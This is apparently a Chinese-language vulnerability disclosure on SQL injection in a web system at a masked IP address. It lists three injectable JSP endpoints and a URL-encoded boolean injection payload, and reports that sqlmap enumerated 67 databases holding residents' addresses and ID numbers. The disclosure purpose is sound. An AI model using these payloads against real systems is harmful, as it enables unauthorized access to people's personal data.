地址:**.**.**.**:8080
注入地址:
1.http://**.**.**.**:8080/web/ConfigDivServ.jsp?op=showModify&uid=%bf
2.http://**.**.**.**:8080/web/web_login_detail.jsp
3.http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1
验证1.
跑出数据库67个:
验证2.
验证3:
先手工看看:
http://**.**.**.**:8080//web/log_bus_list.jsp?userno=-1%27%20OR%203*2*1%3d6%20AND%20000299%3d000299%20or%20%27qeq%27%3d%27
里面包含了地址省份证等信息,也就是说数据库里含有这类敏感信息。
sqlmap验证下
第三处注入属于time-based blind 时间盲注,数据跑的比较慢,不过其数据库在第一处注入点也可以跑出来。
验证3:
先手工看看:
**.**.**.**:8080//web/log_bus_list.jsp?userno=-1%27%20OR%203*2*1%3d6%20AND%20000299%3d000299%20or%20%27qeq%27%3d%27
里面包含了地址省份证等居民信息,也就是说数据库里含有这类敏感信息。具体就不深入,旨在验证。。。